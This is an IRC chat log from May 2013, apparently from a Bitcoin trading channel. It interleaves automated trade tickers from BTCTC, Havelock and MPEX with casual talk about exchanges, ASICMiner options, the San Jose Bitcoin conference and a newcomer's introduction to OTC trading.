[S.DICE-PT] 140 @ 0.002785 = 0.3899 BTC [+] May 19 00:51:18 [BTCTC] [S.DICE-PT] 431 @ 0.0026 = 1.1206 BTC [-] May 19 00:51:19 i got my first referral today from the asicminercharts.com sponsor link May 19 00:51:30 100 microshares sold May 19 00:51:34 [BTCTC] [S.DICE-PT] 120 @ 0.002555 = 0.3066 BTC [-] May 19 00:51:49 [BTCTC] [S.DICE-PT] 1309 @ 0.00255 = 3.338 BTC [-] May 19 00:52:01 [HAVELOCK] [ASICM] 48 @ 0.0208 = 0.9984 BTC [+] May 19 00:52:36 i was quiet surprised to learn that Havelock tracks referral domains May 19 00:53:53 oh wait i have two now May 19 00:53:59 another 356 shares May 19 00:54:32 thjat's so horrible ;/ May 19 00:55:07 [BTCTC] [ESECURITYSABTC] 1 @ 0.23999 BTC [-] May 19 00:55:15 whole situation disgusts me, bfl can apparently do *anything* without any legal problem May 19 00:55:26 [MPEX] [S.MPOE] 7694 @ 0.00070919 = 5.4565 BTC [+] May 19 00:55:30 and satoshidice can't even have a website in da us May 19 00:55:35 jurov legal problems are not instantaenous. May 19 00:55:50 what disgusts me is that people will not throw them out of the building. May 19 00:56:04 basically this is racism. they're americans so their shit don't stink. May 19 00:56:06 oh,and that. May 19 00:56:20 then they accuse me of racism. because that's hwo it works, racists calling sane people racist. May 19 00:56:32 same thing with the jared kenna/tradehill crew May 19 00:57:25 meh the bigger question is how they dare to show their faces May 19 00:57:33 all the defending of patrick harnett back in the day May 19 00:57:34 etc May 19 00:57:41 kakobrekla spineless people are a dime a dozen. May 19 00:58:00 especially if they know they're dealing with sheep. May 19 00:58:00 [HAVELOCK] [ASICM] 11 @ 0.0208 = 0.2288 BTC [+] May 19 01:03:11 hmmm http://thebitcoincard.co.uk/ May 19 01:03:40 [MPEX] [S.MPOE] 4000 @ 0.00070919 = 2.8368 BTC [+] May 19 01:03:43 click on Cardholder Login (SSL) May 19 01:03:49 is not ssl. May 19 01:03:55 ftw May 19 01:04:22 Notice May 19 01:04:23 Can't identify browser version. Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) konqueror/4.10.2 Safari/534.34 May 19 01:04:28 ^^ and i get this May 19 01:04:33 lol May 19 01:05:32 wat, safari on linux? May 19 01:05:39 oh konq May 19 01:05:41 no, konqueror+webkit May 19 01:06:01 i though konq used khtml or did they merge in the webkit changes finally May 19 01:06:14 you can switch to webkit easily May 19 01:06:44 opera ftw May 19 01:07:03 [BTCTC] [ASICMINER-PT] 1 @ 2.065 BTC [-] May 19 01:07:11 lulz oprah, they are killing off presto May 19 01:07:16 [BTCTC] [ASICMINER-PT] 1 @ 2.0665 BTC [+] May 19 01:07:23 going to webkit like p.much everything else but mozilla May 19 01:07:28 yea its smart move May 19 01:08:17 *shrugs*, they did a pretty good job in-house May 19 01:10:00 [HAVELOCK] [ASICM] 25 @ 0.0208 = 0.52 BTC [+] May 19 01:10:07 linx ftw May 19 01:12:18 mircea browses through teletype? May 19 01:12:43 [BTCTC] [ESECURITYSABTC] 1 @ 0.255011 BTC [+] May 19 01:13:10 why not ? text ftw. May 19 01:13:34 [BTCTC] [S.DICE-PT] 5 @ 0.00279 = 0.014 BTC [+] May 19 01:13:39 my irc is 3d May 19 01:13:42 what am i missing, all the rounded corners everywhere ? May 19 01:14:16 width, height and time, right? May 19 01:14:22 so you have stuff from dtng transcribed to text, too? May 19 01:14:29 [BTCTC] [ASICMINER-PT] 1 @ 2.068 BTC [+] May 19 01:14:42 jurov linx renders jpegs May 19 01:14:54 in ascii art? May 19 01:14:58 [BTCTC] [GSDPT] 5 @ 0.002828 = 0.0141 BTC [+] May 19 01:15:31 been a deceda since i last used it May 19 01:15:36 decade May 19 01:16:49 [BTCTC] [ASICMINER-PT] 2 @ 2.069 = 4.138 BTC [+] May 19 01:17:06 lol actually iirc there is a jpg to ascii plugin May 19 01:18:33 anyway. i use opera too, May 19 01:18:50 [MPEX] [S.MPOE] 7513 @ 0.00070773 = 5.3172 BTC [-] May 19 01:18:52 [MPEX] [S.MPOE] 5592 @ 0.00070658 = 3.9512 BTC [-] May 19 01:19:02 visiting the conference : http://www.youtube.com/watch?v=s5In1uBWcHg May 19 01:19:56 feel better now, didnt miss much May 19 01:19:58 did you make that vid? May 19 01:20:01 ah May 19 01:20:29 is this guy : https://bitcointalk.org/index.php?topic=135407.msg2194716#msg2194716 May 19 01:21:05 [BTCTC] [PAJKA.BOND] 2 @ 0.1089 = 0.2178 BTC [+] May 19 01:22:08 [BTCTC] [PAJKA.BOND] 58 @ 0.109 = 6.322 BTC [+] May 19 01:22:36 expecting a lot of geek with computer and cable everywhere May 19 01:22:59 all i see is a bunch of PR and tourist May 19 01:24:04 [BTCTC] [ASICMINER-PT] 1 @ 1.6 BTC [-] May 19 01:25:32 prolly miners/hackers aren't so much into conference tourism May 19 01:26:17 all i see is a bunch of PR and tourist << that and scammers seems to be it. May 19 01:26:21 at least friom what i gather. May 19 01:26:25 http://www.reddit.com/r/Bitcoin/comments/1elfgj/zhoutonged_please_come_play_at_bitcoin2013/ May 19 01:26:26 O_O May 19 01:26:45 I saw you say you were willing to perform. I just got the official go ahead from the foundation. We would really love you to perform. May 19 01:29:15 lol from what i see so far the unsystem conference might be actually more interesting May 19 01:29:58 [BTCTC] [CRYPTO-TRADE] 16 @ 0.2 = 3.2 BTC [+] May 19 01:30:10 but whether amir is able to manage such undertaking, is a question May 19 01:30:48 so these guys are never lever going away May 19 01:31:00 -l May 19 01:31:32 http://unsystem.net/info/ muhahaha he wants to have closing party in bratislava... in a hackerspace with 100 ppl max capacity May 19 01:31:52 for a conference with thousands in attendance May 19 01:34:34 [BTCTC] [COGNITIVE] 1 @ 0.234998 BTC [+] May 19 01:35:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.02035 = 0.1018 BTC [+] May 19 01:37:32 jurov there weren/t 100 in london. May 19 01:37:38 i dunno who'd go to an amir conference. May 19 01:37:47 well cant you read May 19 01:37:51 its says on the site May 19 01:37:55 "We expect a million people globally." May 19 01:38:27 also maff. May 19 01:39:01 [HAVELOCK] [ASICM] 10 @ 0.0207512 = 0.2075 BTC [-] May 19 01:43:27 [BTCTC] [BITVPS] 10 @ 0.000672 = 0.0067 BTC [-] May 19 01:43:32 [BTCTC] [BITVPS] 4 @ 0.000671 = 0.0027 BTC [-] May 19 01:44:01 [BTCTC] [BITVPS] 1 @ 0.00064 BTC [-] May 19 01:44:50 [BTCTC] [BITVPS] 1500 @ 0.000601 = 0.9015 BTC [-] May 19 01:45:00 [HAVELOCK] [ASICM] 990 @ 0.0207512 = 20.5437 BTC [-] May 19 01:45:49 [BTCTC] [BASIC-MINING] 1 @ 0.469999 BTC [-] May 19 01:46:06 [BTCTC] [BASIC-MINING] 2 @ 0.47 = 0.94 BTC [+] May 19 01:46:08 "Ive been trading for years and I'm looking to get more into bitcoin market making, specifically equity derivatives/stock options. I used to be a pharmaceutical stock options market market for Goldman Sachs here on the AMEX floor in NYC so I have a bit of background...Thanks, Thomas" May 19 01:46:21 I told him to come here May 19 01:46:26 and referred him to MPEX May 19 01:47:01 (he meant to say market maker) May 19 01:48:00 [HAVELOCK] [ASICM] 5 @ 0.02079512 = 0.104 BTC [+] May 19 01:48:50 Erik just gave a good talk, I enjoyed it May 19 01:49:09 did you finish? May 19 01:49:12 ;) May 19 01:49:14 a you're there pizzaman1337 ? May 19 01:49:20 yeah May 19 01:49:24 he's answering Q's now May 19 01:49:33 ThickAsThieves cool May 19 01:50:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.02035 = 0.0611 BTC [+] May 19 01:50:33 i guess we have to wait again 5years for a livestream ? May 19 01:50:45 lol May 19 01:51:30 you know this new thing, internet ! May 19 01:52:52 Ask him if its not to hot on Panama ? May 19 01:53:17 too* ;) May 19 01:53:32 o look who's here. May 19 01:54:17 how's life been treatin' ya random_cat ? May 19 01:54:56 and if he feel comfortable when he past through customs May 19 01:57:27 I'll catch him later and ask other questions May 19 02:04:00 [HAVELOCK] [ASICM] 315 @ 0.02079512 = 6.5505 BTC [+] May 19 02:05:00 [HAVELOCK] [ASICM] 2 @ 0.02079512 = 0.0416 BTC [+] May 19 02:06:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.02035 = 0.0814 BTC [+] May 19 02:11:04 hey all first time here, name is Thomas and Im used to be a former AMEX pharmaceutical stock options trader for Goldman Sachs here in NYC and also on the PCX in SF May 19 02:11:55 oh, a wall street supernode May 19 02:11:57 welcome May 19 02:12:22 looking for marking making opportunities on emerging BTC exchanges spec ASICMINER options May 19 02:12:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02035 = 0.0611 BTC [+] May 19 02:13:20 heya sikbwoy May 19 02:13:46 yaow May 19 02:14:01 [HAVELOCK] [ASICM] 93 @ 0.02079512 = 1.9339 BTC [+] May 19 02:14:05 there's no emmerging btc exchanges. there's mpex that's been there since before time and there's btctc/havelock/bitfunder and so on. May 19 02:15:27 Just meant to relate that all these exchanges are rather new... when did mpex start? May 19 02:15:53 mpoe started august 2011. mpex was acquired march 2012 or something like that May 19 02:16:13 its treating me well, mircea_popescu. it was a beautiful day for cycling, so i went for 120k May 19 02:16:23 o hey. May 19 02:16:44 (in case anyone wonders, random_cat is the frist guy mpoe traded options with. back in august... or was it july ?) May 19 02:17:37 well.. they expired 2011-07-29 May 19 02:18:10 so then july it is May 19 02:19:01 [MPEX] [S.MPOE] 3298 @ 0.00070658 = 2.3303 BTC [-] May 19 02:19:01 it seems i did not record the date the transaction took place May 19 02:19:30 Mpex doesn't trade ASICMINER anything correct? May 19 02:19:54 sikbwoy yeah, asicminer is handled through passthroughs lately. May 19 02:20:17 that aside you can probably get an otc deal struck if you have the btc to escrow it. May 19 02:20:35 on Mpex? May 19 02:20:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.02035 = 0.0407 BTC [+] May 19 02:20:49 otc is here. May 19 02:20:59 a good step for a new guy would be getting registered with gribble / into the wot May 19 02:21:01 ahhh May 19 02:21:14 gotcha May 19 02:21:29 that allows you to build your rep, trade over the counter , ie , with priovate parties. May 19 02:21:37 ;;getrating mircea_popescu May 19 02:21:37 WARNING: Currently not authenticated. User mircea_popescu, rated since Fri Jul 22 08:04:26 2011. Cumulative rating 84, from 65 total ratings. Received ratings: 56 positive, 9 negative. Sent ratings: 64 positive, 15 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=mircea_popescu May 19 02:21:41 that thing. May 19 02:21:49 so I could list options I want to sell on here and then have an agreed up escrow? May 19 02:22:02 surely. May 19 02:22:03 *agreed on May 19 02:22:09 ;;ways to talk to mpex May 19 02:22:10 Error: "ways" is not a valid command. May 19 02:22:12 ;;google ways to talk to mpex May 19 02:22:13 The many ways available for talking to MPEx pe Trilema - Un blog ...: ; MPEx & Bitcoin Stock Exchanges - Bitcoin Forum: ; FAQ - O.USD.C029T: May 19 02:22:22 there's a summary of bot commands in the first link too May 19 02:22:30 stuff like May 19 02:22:38 !ticker bt asicminer-pt May 19 02:22:40 [BTCT:ASICMINER-PT] 1D: 1.899512 / 2.02024 / 2.09 (526 shares, 1062.6 BTC), 7D: 1.460001 / 1.72988 / 2.09 (3480 shares, 6020 BTC), 30D: 1 / 1.45231 / 2.09 (9480 shares, 13767.9 BTC) May 19 02:26:14 i was looking about your site (and also an introducing brokers) but could not find the detailed option contract specs May 19 02:27:02 heh since the namechange they lost their text. May 19 02:27:10 will be fixed momentarily. May 19 02:27:19 i figured it was that sort of bitrot :) May 19 02:27:26 anyway, they expire on last friday of month, T this one N next one May 19 02:27:44 [MPEX] [S.MPOE] 13241 @ 0.00070441 = 9.3271 BTC [-] May 19 02:27:45 [MPEX] [S.MPOE] 6730 @ 0.00070333 = 4.7334 BTC [-] May 19 02:27:47 ya names used to be BTCUSDblabla, changed when i got forced to move digits around so as not to ruin downstream code. May 19 02:27:51 [MPEX] [S.MPOE] 2029 @ 0.00070231 = 1.425 BTC [-] May 19 02:28:16 http://trilema.com/2013/mpex-btc-usd-options-denomination-change/ May 19 02:29:16 random_cat jurov runs coinbr.com not sure if you know about that May 19 02:31:59 Chilca you at san jose conference ? May 19 02:32:17 mircea_popescu: yes I'm May 19 02:32:21 very nice conference May 19 02:32:26 enjoying it ? May 19 02:32:36 I was aware of coinbr, but don't think i know jurov May 19 02:32:53 yes!! It's incredible good May 19 02:33:04 Erik was talking a few minutes ago May 19 02:33:53 is there any way you can watch it online? May 19 02:34:04 its not 2013 yet May 19 02:34:06 i don't really do video, but i get summaries mostly. May 19 02:34:25 kakobrekla https://twitter.com/Mircea_Popescu/status/335900364991782914 ;p May 19 02:34:48 i better watch my mouth May 19 02:35:14 omg chilling effect ? May 19 02:36:01 NOISE! May 19 02:36:10 There, now you guys have to keep in line for the next 99 statements. May 19 02:36:24 Going to bed, night. May 19 02:36:26 microsoft sent you here to sabotage us isnt it May 19 02:36:44 Sshhhh... The others aren't supposed to know yet. May 19 02:37:20 anyway you've got your maffs wrong. May 19 02:37:37 just as long as i say something every 100 lines the noise is under 99%. May 19 02:38:21 Head to tired to make sense right now. Beer isn't helping. Will have to argue or agree tomorrow. May 19 02:39:00 [HAVELOCK] [ASICM] 42 @ 0.0202 = 0.8484 BTC [-] May 19 02:39:01 [HAVELOCK] [ASICM] 400 @ 0.0201 = 8.04 BTC [-] May 19 02:43:01 [BTCTC] [TAT.ASICMINER] 12 @ 0.02035 = 0.2442 BTC [+] May 19 02:44:26 Thx for all the info mircea_popescu... currently perusing now May 19 02:44:40 don't worry. there's tons of stuff to read etc. May 19 02:44:50 best use of your time for the first few weeks is going through it. May 19 02:46:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02035 BTC [+] May 19 02:48:53 [MPEX] [S.MPOE] 6000 @ 0.00070484 = 4.229 BTC [+] May 19 02:49:27 Confirmed total: 6,660 BTC May 19 02:49:30 we're screwed. May 19 02:53:57 [BTCTC] [ASICMINER-PT] 2 @ 1.999002 = 3.998 BTC [+] May 19 02:55:17 [BTCTC] [ASICMINER-PT] 12 @ 1.999 = 23.988 BTC [-] May 19 02:55:29 [BTCTC] [ASICMINER-PT] 9 @ 1.99 = 17.91 BTC [-] May 19 02:56:59 [HAVELOCK] [HIM] 1 @ 1.8 BTC [-] May 19 02:57:26 [BTCTC] [ASICMINER-PT] 1 @ 2.015 BTC [+] May 19 02:58:07 Hey sikbwoy, glad you could join us May 19 02:58:26 regarding AM options, depending on what you're aiming for, I might be interested May 19 03:01:43 yea Id actually prefer selling TAT options (but liquidity is almost non existent) to regular PT options but fine with both obvs May 19 03:01:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.02035 = 0.0407 BTC [+] May 19 03:02:12 how do you two know each other anyway ? May 19 03:02:21 he pm'd me on forums May 19 03:02:32 no connection otherwise May 19 03:02:59 only way to sell TAT option is to buy TAT shares May 19 03:03:11 to you might need to buy on PTs or otc May 19 03:03:35 TAT.AM doesn't support import/export though May 19 03:03:39 yea i have TAT shares, but theres little option trading goin on rite now on TAT May 19 03:03:44 whereas the whole-share PTs do May 19 03:03:55 I started writing some initially May 19 03:04:01 but no one cared May 19 03:04:17 the typical buyer of AM wouldn't know what to do with them May 19 03:04:39 some told me they wanted to short it May 19 03:04:44 but they are silent May 19 03:04:50 lately May 19 03:05:23 sikbwoy you trying to go which direction ? or do what exactly ? May 19 03:06:34 ThickAsThieves was it mp ? :) May 19 03:07:01 it was jurov May 19 03:07:12 and i forget who else May 19 03:07:20 mp may have mentioned it a while back May 19 03:07:34 https://bitcointalk.org/index.php?board=129.0 May 19 03:07:34 but he probably wants a 6-month one or something May 19 03:07:38 holy shit this is retarded May 19 03:07:40 which I wouldn't touch May 19 03:07:50 they now have an entire subforum dedicated to doing wot by hand ? May 19 03:08:02 ThickAsThieves 3 months works. May 19 03:08:34 LTC wot? May 19 03:08:39 heh May 19 03:08:45 [BTCTC] [ASICMINER-PT] 1 @ 1.990001 BTC [-] May 19 03:08:59 just exploring the community, exchanges etc, thinking of possibly bringing some large amounts of $$$ to trade and Im trying to find exchanges to affiliate with that have liquid enough markets May 19 03:09:32 sikbwoy let's give you more stuff to read then May 19 03:09:50 http://trilema.com/2013/the-best-investments-in-the-history-of-bitcoin/ May 19 03:09:55 http://trilema.com/2013/mpex-one-year-of-dividends/ May 19 03:10:03 http://trilema.com/2013/the-future-of-bitcoin-regulation/ May 19 03:10:32 [BTCTC] [ASICMINER-PT] 1 @ 1.99 BTC [-] May 19 03:11:02 [BTCTC] [ASICMINER-PT] 1 @ 1.985 BTC [-] May 19 03:11:03 "if that's the way it ends up, that all the central banks stop printing money, then we fuckin' won" -evoorhees May 19 03:11:07 [BTCTC] [ASICMINER-PT] 6 @ 1.98 = 11.88 BTC [-] May 19 03:11:28 heh. not that anyone'd admit it. May 19 03:11:37 https://bitcointalk.org/index.php?topic=110805.msg2125757#msg2125757 actually this sonny vleisides stuff is pretty good May 19 03:12:14 [BTCTC] [ASICMINER-PT] 1 @ 1.9602 BTC [-] May 19 03:12:24 this conf is fun May 19 03:14:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.020001 = 0.2 BTC [-] May 19 03:14:39 the hashing map of the US is a laugh May 19 03:14:50 i actually noticed that the other day May 19 03:14:58 as if a fellow who can afford world-class hashing power would forgo TOR. May 19 03:15:02 isnt that the nodes count May 19 03:15:05 asciilifeform it's kinda funny, the desperate quest of americanski for relevance. May 19 03:17:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.02 = 0.06 BTC [-] May 19 03:19:38 [BTCTC] [ASICMINER-PT] 1 @ 1.96 BTC [-] May 19 03:19:42 [BTCTC] [ASICMINER-PT] 3 @ 1.940501 = 5.8215 BTC [-] May 19 03:23:34 someone has a bid up form 10 quadrillion TAT.AM at ฿0.0 on Bitfunder May 19 03:23:39 for* May 19 03:24:01 [HAVELOCK] [ASICM] 1 @ 0.0201 BTC [-] May 19 03:24:01 [HAVELOCK] [ASICM] 10 @ 0.02 = 0.2 BTC [-] May 19 03:24:03 [HAVELOCK] [ASICM] 9 @ 0.02 = 0.18 BTC [-] May 19 03:24:36 http://www.youtube.com/watch?v=3XjgHEctcy0 May 19 03:24:41 this is pretty good i hear. May 19 03:25:03 i saw the entire show yest. May 19 03:25:08 i admit. May 19 03:25:39 the girl likes the chick for some reason. May 19 03:25:47 i dunno wtf is with women, they have no taste in women. May 19 03:26:23 like the personality? May 19 03:26:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.019854 = 0.0397 BTC [-] May 19 03:26:36 no, like the looks. May 19 03:27:05 i like waitresses better May 19 03:27:26 "the customer is not always right" gotta agree May 19 03:27:59 well the thing is... that looks like some pizzeria/fast food joint. May 19 03:28:18 the customer is never right there. he bought by the 2.50 or w./e price, he is charged that, end of discussion. May 19 03:28:18 yeah italian etc May 19 03:28:37 if he goes to an actual restaurant where he orders by the food rather than by the price May 19 03:28:45 then yeah he's pretty darn always right May 19 03:29:02 [MPEX] [S.MPOE] 8400 @ 0.00070484 = 5.9207 BTC [+] May 19 03:29:07 [MPEX] [S.MPOE] 10302 @ 0.00070526 = 7.2656 BTC [+] May 19 03:29:34 If you eeet, den you enshoy May 19 03:30:47 lol May 19 03:31:45 this is getting pretty funny May 19 03:37:32 https://bitcointalk.org/index.php?topic=93445.msg2195927#msg2195927 May 19 03:37:59 jeez. May 19 03:38:36 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [+] May 19 03:38:43 didnt he get like 20k May 19 03:39:51 and his repayment: https://blockchain.info/nl/charts/received-per-day?address=14ubeus6MbjWqy13x2uFPS6XFUyE92ty96 May 19 03:40:44 [BTCTC] [S.DICE-PT] 1 @ 0.00255 BTC [-] May 19 03:45:21 [BTCTC] [TAT.ASICMINER] 21 @ 0.019473 = 0.4089 BTC [-] May 19 03:45:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.01946 = 0.973 BTC [-] May 19 03:45:38 [BTCTC] [TAT.ASICMINER] 9 @ 0.019451 = 0.1751 BTC [-] May 19 03:47:47 [BTCTC] [ASICMINER-PT] 1 @ 1.886 BTC [-] May 19 03:48:00 [BTCTC] [ASICMINER-PT] 1 @ 1.8853 BTC [-] May 19 03:48:04 [BTCTC] [ASICMINER-PT] 1 @ 1.8851 BTC [-] May 19 03:49:23 [BTCTC] [ASICMINER-PT] 1 @ 1.8851 BTC [-] May 19 03:49:27 [BTCTC] [ASICMINER-PT] 2 @ 1.885 = 3.77 BTC [-] May 19 03:51:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.019451 BTC [-] May 19 03:52:50 [BTCTC] [TAT.ASICMINER] 25 @ 0.01945 = 0.4863 BTC [-] May 19 03:53:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.0192 = 0.384 BTC [-] May 19 03:54:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.0191 = 0.2292 BTC [-] May 19 03:54:32 [BTCTC] [TAT.ASICMINER] 30 @ 0.0191 = 0.573 BTC [-] May 19 03:55:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.01906 = 0.953 BTC [-] May 19 03:55:53 [BTCTC] [ASICMINER-PT] 1 @ 1.885 BTC [-] May 19 03:55:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.01906 = 0.2097 BTC [-] May 19 03:56:13 [BTCTC] [TAT.ASICMINER] 46 @ 0.01905 = 0.8763 BTC [-] May 19 03:57:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.01903 = 0.2284 BTC [-] May 19 03:57:41 [BTCTC] [TAT.ASICMINER] 80 @ 0.01902 = 1.5216 BTC [-] May 19 03:58:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.019 = 0.475 BTC [-] May 19 03:59:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.018999 = 0.19 BTC [-] May 19 03:59:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.0185 = 0.37 BTC [-] May 19 03:59:51 [BTCTC] [TAT.ASICMINER] 25 @ 0.019 = 0.475 BTC [+] May 19 04:01:05 [BTCTC] [TAT.ASICMINER] 9 @ 0.01902 = 0.1712 BTC [+] May 19 04:03:00 [HAVELOCK] [ASICM] 2 @ 0.02 = 0.04 BTC [-] May 19 04:15:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.019 = 0.19 BTC [-] May 19 04:17:51 [MPEX] [S.MPOE] 3700 @ 0.00070632 = 2.6134 BTC [+] May 19 04:17:53 [MPEX] [S.MPOE] 2350 @ 0.00070812 = 1.6641 BTC [+] May 19 04:22:00 [HAVELOCK] [ASICM] 2 @ 0.0199 = 0.0398 BTC [-] May 19 04:22:01 [HAVELOCK] [ASICM] 48 @ 0.0198 = 0.9504 BTC [-] May 19 04:32:56 [BTCTC] [ASICMINER-PT] 1 @ 1.949999 BTC [+] May 19 04:33:39 [BTCTC] [ASICMINER-PT] 1 @ 1.95 BTC [+] May 19 04:33:45 paid another dmc dividend out May 19 04:34:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0187 BTC [-] May 19 04:34:46 [BTCTC] [TAT.ASICMINER] 18 @ 0.0186 = 0.3348 BTC [-] May 19 04:34:48 ;;ticker May 19 04:34:49 BTCUSD ticker | Best bid: 123.06002, Best ask: 123.06004, Bid-ask spread: 0.00002, Last trade: 123.19000, 24 hour volume: 21485.29077490, 24 hour low: 122.55000, 24 hour high: 125.31189, 24 hour vwap: 123.83185 May 19 04:39:38 [BTCTC] [ASICMINER-PT] 1 @ 2.01 BTC [+] May 19 04:41:02 [BTCTC] [ASICMINER-PT] 1 @ 2.01 BTC [+] May 19 04:43:30 [BTCTC] [ASICMINER-PT] 1 @ 2.009999 BTC [-] May 19 04:49:03 [BTCTC] [ASICMINER-PT] 1 @ 1.909903 BTC [-] May 19 04:49:08 [BTCTC] [ASICMINER-PT] 1 @ 1.909902 BTC [-] May 19 04:49:50 [BTCTC] [ASICMINER-PT] 2 @ 1.9099 = 3.8198 BTC [-] May 19 04:50:59 [BTCTC] [ASICMINER-PT] 2 @ 1.9099 = 3.8198 BTC [-] May 19 04:52:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.019002 = 0.19 BTC [+] May 19 04:52:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.019001 BTC [-] May 19 04:52:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.019 = 0.95 BTC [-] May 19 04:54:54 https://bitcointalk.org/index.php?topic=209035.0 May 19 04:54:58 this lauched today May 19 04:55:15 this the 25th alt? May 19 04:56:21 my mafferator does not support integers that long May 19 04:56:40 Definition: A Nibble is a set of four bits. A nibble is half of one byte or 4 bits. May 19 04:56:40 We are proud to introduce the "Nibble". May 19 04:56:46 sounds very innovative May 19 04:57:27 Nipple nibble? May 19 04:58:28 now that'd actually be a good idea for a change. May 19 04:59:03 the ironic thing here is... i have a twelve page summary of a 170ish page sometrhing awful thread about bitcoin (made in the past coupla months i think) May 19 04:59:12 and a 19 page summary of the proceeds of the conference. May 19 04:59:21 i got through 3 pages of the latter before being bored to tears. May 19 04:59:27 i'm reading the fgormer, it's not so bad. May 19 04:59:30 anyone that has never Nibbled nipple cant mine my Nipple nibbles May 19 05:00:35 dont your ripple my nibbles May 19 05:00:53 you* May 19 05:00:54 rippled for her pleasure May 19 05:01:09 cant type for shit May 19 05:01:39 ok, this is a win. May 19 05:01:47 rippled for her pleasure. yeah. May 19 05:02:34 http://player.vimeo.com/video/66482225 bitcoin doc May 19 05:03:58 [MPEX] [S.MPOE] 7948 @ 0.0007054 = 5.6065 BTC [-] May 19 05:05:00 [BTCTC] [ASICMINER-PT] 1 @ 1.988999 BTC [+] May 19 05:05:29 [BTCTC] [ASICMINER-PT] 2 @ 1.989 = 3.978 BTC [+] May 19 05:06:02 [BTCTC] [ASICMINER-PT] 23 @ 1.99 = 45.77 BTC [+] May 19 05:06:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.019332 = 0.1933 BTC [+] May 19 05:07:10 [BTCTC] [S.DICE-PT] 4 @ 0.00275 = 0.011 BTC [+] May 19 05:14:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.019334 = 0.1933 BTC [+] May 19 05:14:33 [BTCTC] [TAT.ASICMINER] 54 @ 0.019333 = 1.044 BTC [-] May 19 05:15:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.018999 = 0.19 BTC [-] May 19 05:15:54 [BTCTC] [TAT.ASICMINER] 136 @ 0.019 = 2.584 BTC [+] May 19 05:29:00 [HAVELOCK] [ASICM] 44 @ 0.0205 = 0.902 BTC [+] May 19 05:30:46 ;;ticker May 19 05:30:49 BTCUSD ticker | Best bid: 123.60706, Best ask: 123.61700, Bid-ask spread: 0.00994, Last trade: 123.60706, 24 hour volume: 17428.09714472, 24 hour low: 122.59591, 24 hour high: 125.31189, 24 hour vwap: 123.67594 May 19 05:30:50 !ticker m s.mpoe May 19 05:30:51 [MPEX:S.MPOE] 1D: 0.00069249 / 0.00070347 / 0.00070919 (369081 shares, 259.64 BTC), 7D: 0.00066484 / 0.00068714 / 0.00071231 (2334014 shares, 1,603.80 BTC), 30D: 0.00064 / 0.00070139 / 0.00076528 (10149078 shares, 7,118.48 BTC) May 19 05:30:59 !last m s.mpoe May 19 05:31:00 Last trade for S.MPOE on MPEX was at 0.0007054 BTC [-] May 19 05:38:57 [BTCTC] [ASICMINER-PT] 2 @ 1.99 = 3.98 BTC [+] May 19 05:39:59 [HAVELOCK] [ASICM] 16 @ 0.0205 = 0.328 BTC [+] May 19 05:40:00 [HAVELOCK] [ASICM] 5 @ 0.0205 = 0.1025 BTC [+] May 19 05:49:09 [BTCTC] [ASICMINER-PT] 7 @ 1.99 = 13.93 BTC [+] May 19 05:49:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.018501 = 0.0925 BTC [-] May 19 05:50:23 [BTCTC] [B.YABMC] 1 @ 0.015 BTC [-] May 19 05:53:18 [MPEX] [S.MPOE] 8001 @ 0.00070231 = 5.6192 BTC [-] May 19 05:53:20 [MPEX] [S.MPOE] 7880 @ 0.00070211 = 5.5326 BTC [-] May 19 05:53:31 [MPEX] [S.MPOE] 2523 @ 0.00070203 = 1.7712 BTC [-] May 19 05:55:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.019599 = 0.098 BTC [+] May 19 05:57:54 [BTCTC] [TAT.ASICMINER] 12 @ 0.0196 = 0.2352 BTC [+] May 19 06:01:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0196 BTC [+] May 19 06:04:02 The Hong Kong Mercantile Exchange (HKMEx) announces today it has decided to voluntarily surrender the authorisation to provide automated trading services (“ATS”) granted by the Securities and Futures Commission (“the SFC”). With immediate effect, no new orders may be placed and all open positions will be financially settled at the settlement price determined by HKMEx and its designated clear May 19 06:04:06 ok this is juicy. May 19 06:05:49 [MPEX] [S.MPOE] 13977 @ 0.00070203 = 9.8123 BTC [-] May 19 06:05:51 [MPEX] [S.MPOE] 6903 @ 0.00070084 = 4.8379 BTC [-] May 19 06:08:41 [BTCTC] [ASICMINER-PT] 3 @ 1.985 = 5.955 BTC [-] May 19 06:15:01 mircea_popescu: cui bono? May 19 06:17:06 well that's a layered cake. May 19 06:17:18 the azns failed to make inroads in the market. inexplicably. May 19 06:17:31 the goldbugs know it's because of the soros jew gay conspiracy May 19 06:17:57 the physical delivery side of pm is tensed to all hell. shanghai mercantile no longer delivers either May 19 06:18:18 mircea_popescu: perhaps they ran out of tungsten May 19 06:18:18 on it goes. May 19 06:22:08 [MPEX] [S.MPOE] 7884 @ 0.00069924 = 5.5128 BTC [-] May 19 06:38:18 [MPEX] [S.MPOE] 5446 @ 0.00070044 = 3.8146 BTC [+] May 19 06:41:03 [BTCTC] [ASICMINER-PT] 2 @ 1.98 = 3.96 BTC [-] May 19 06:43:15 